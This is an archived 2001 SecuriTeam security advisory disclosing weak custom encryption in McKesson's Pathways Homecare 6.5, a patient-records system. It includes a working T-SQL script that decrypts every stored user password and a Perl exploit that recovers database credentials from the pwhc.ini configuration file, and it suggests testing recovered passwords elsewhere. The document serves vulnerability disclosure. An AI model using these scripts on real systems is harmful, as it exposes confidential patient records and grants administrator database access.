[NT] Weak Encryption in Pathways Homecare

From: support@securiteam.com
Date: 12/11/01 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 11 Dec 2001 22:48:30 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Weak Encryption in Pathways Homecare
------------------------------------------------------------------------

SUMMARY

 
<http://caci.strategicsystems.com/caci/corporate/prodport2.nsf/All+Products/697662375BF0D9E8852565E1006E9DB7?OpenDocument> Pathways Homecare may give attackers access to certain configuration files, and enables them to achieve 'sa' or equivalent account privileges for SQL Server 7.0 (MSDE). In addition, it is possible to retrieve application passwords for all users of the application.

DETAILS

Vulnerable systems:
Pathways Homecare version 6.5

According to the vendor, McKesson's Pathways Homecare is the first
comprehensive client/server application introduced to the homecare market
for advanced information management.

This is a product that stores patient information, billing information,
and medical records for people who receive health care in their homes.
Each clinician has a laptop and all the laptops are periodically
synchronized with a central database. Additionally there is a desktop
client for administrative staff. Both the laptops and the central
database server run Microsoft SQL Server 7.0.

Workstation and laptop users alike get their connection information from a
file named pwhc.ini that contains an encrypted username and password. For
workstations, the file is stored on a central fileserver and the account
is likely to have DBO level permissions on the central database. For the
laptops, this file is stored locally and the account used is either 'sa'
on the local version of SQL or has equivalent permissions.

As you have probably guessed by now, the vendor has decided to use their
own encryption algorithm:

1) They determine whether the username/password is even or odd in length.
2) If odd, they use the following sequence of numbers: 3,8,5,10,7...
3) If even, the sequence is 7,4,9,6,11...
4) Then they reverse the username/password and subtract the corresponding
number in the sequence from each byte.

Obviously, this encryption algorithm can be easily reversed.

This grants anyone who can get access to the config files for Pathways
Homecare to read and modify confidential patient information as well as
enjoy sa privileges on laptop clients. The next stage is to obtain access
to the data.

Unfortunately the vendor uses the exact same encryption method with
slightly different key sequences for this additional layer of security.
It's possible to retrieve the username and password for every user in
about 2 seconds. The T-SQL code to do this follows:

SET NOCOUNT ON
DECLARE @evenkey varchar(15)
DECLARE @oddkey varchar(15)
DECLARE @key varchar(15)
DECLARE @cryptstr varchar(15)
DECLARE @position tinyint
DECLARE @length tinyint
DECLARE @usrid varchar(30)

DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
OPEN pwd_cursor
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
SET @evenkey = 'FDHFJHLJNLPNRP'
SET @oddkey = 'CGEIGKIMKOMQOSQ'

WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @position = 1
SET @length = datalength(@cryptstr)
IF ((@length % 2) = 1) SET @key = @oddkey
ELSE SET @key = @evenkey

WHILE (@position <= @length)
BEGIN
   SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
       CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
       + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
   SET @position = @position + 1
END
PRINT @usrID + ' : ' + @cryptstr
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
END
DEALLOCATE pwd_cursor
GO

Bang! Out come the passwords and it is time to see if the user uses the
same password elsewhere.

Vendor status:
The vendor was contacted (security-alert@mckesson.com) 2 weeks ago. An
immediate response was received telling that the message had been
forwarded to the appropriate parties within the Pathways Homecare product
group. No further response was received.

Exploit:
#! /usr/bin/perl -w
####################################################################
# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini
file
####################################################################

use strict;

open (PWHC, "pwhc.ini") or die "Unable to open .ini file";
while (<PWHC>) {
   chomp;
   if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
   if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
}

####################################################################
# The sad thing is that this isn't the worst part of product. It's not
# that the vendor is using weak encryption, it's that the quality of
# the encryption is better than most of their code.
####################################################################

sub decrypt {
   my $counter = 0;
   my $key;
   my @cryptstr = split /=/, $_, 2;
   my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
   if(@revstr % 2) {
      $key = 3;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? 5 : -3;
      }
   }
   else {
      $key = 7;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? -3 : 5;
      }
   }
   return pack("c*", (reverse @revstr));
}

__END__

ADDITIONAL INFORMATION

The information has been provided by <mailto:shoeboy@adequacy.org>
shoeboy.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Encryption Can Save Data in Laptop Lapses
    ... Reports of data theft often conjure up images of malicious hackers ... breaking into remote databases to filch Social Security numbers, ... low-tech street thug who runs off with a laptop loaded with private ... Encryption, on the other hand, scrambles the information ...
    (comp.dcom.telecom)
  • Re: Laptop Encryption & Hibernation
    ... get through such "security" in a matter of time. ... Therefore giving up the hibernation is about ... the encryption would be a better solution. ... > Subject: Re: Laptop Encryption & Hibernation ...
    (Security-Basics)
  • RE: Encryption on Laptops?
    ... Honestly, protecting data on a laptop is very, very hard to accomplish. ... If you enable EFS on Windows XP, this provides you with 128-bit encryption. ... really affecting security. ... to facilitate one-on-one interaction with one of our expert instructors. ...
    (Security-Basics)
  • RE: Encryption on Laptops?
    ... > Honestly, protecting data on a laptop is very, very hard to accomplish. ... > If you enable EFS on Windows XP, this provides you with 128-bit encryption. ... > really affecting security. ... > pen testing experience in our state of the art hacking lab. ...
    (Security-Basics)
  • CryptoSurvey -- Results ..
    ... Many same or similar behavioral barriers for the ... effective utilization of many security solutions still exist limiting ... applications of encryption technologies currently in commercial ... Many people do not care about cryptography and/or security products ...
    (sci.crypt)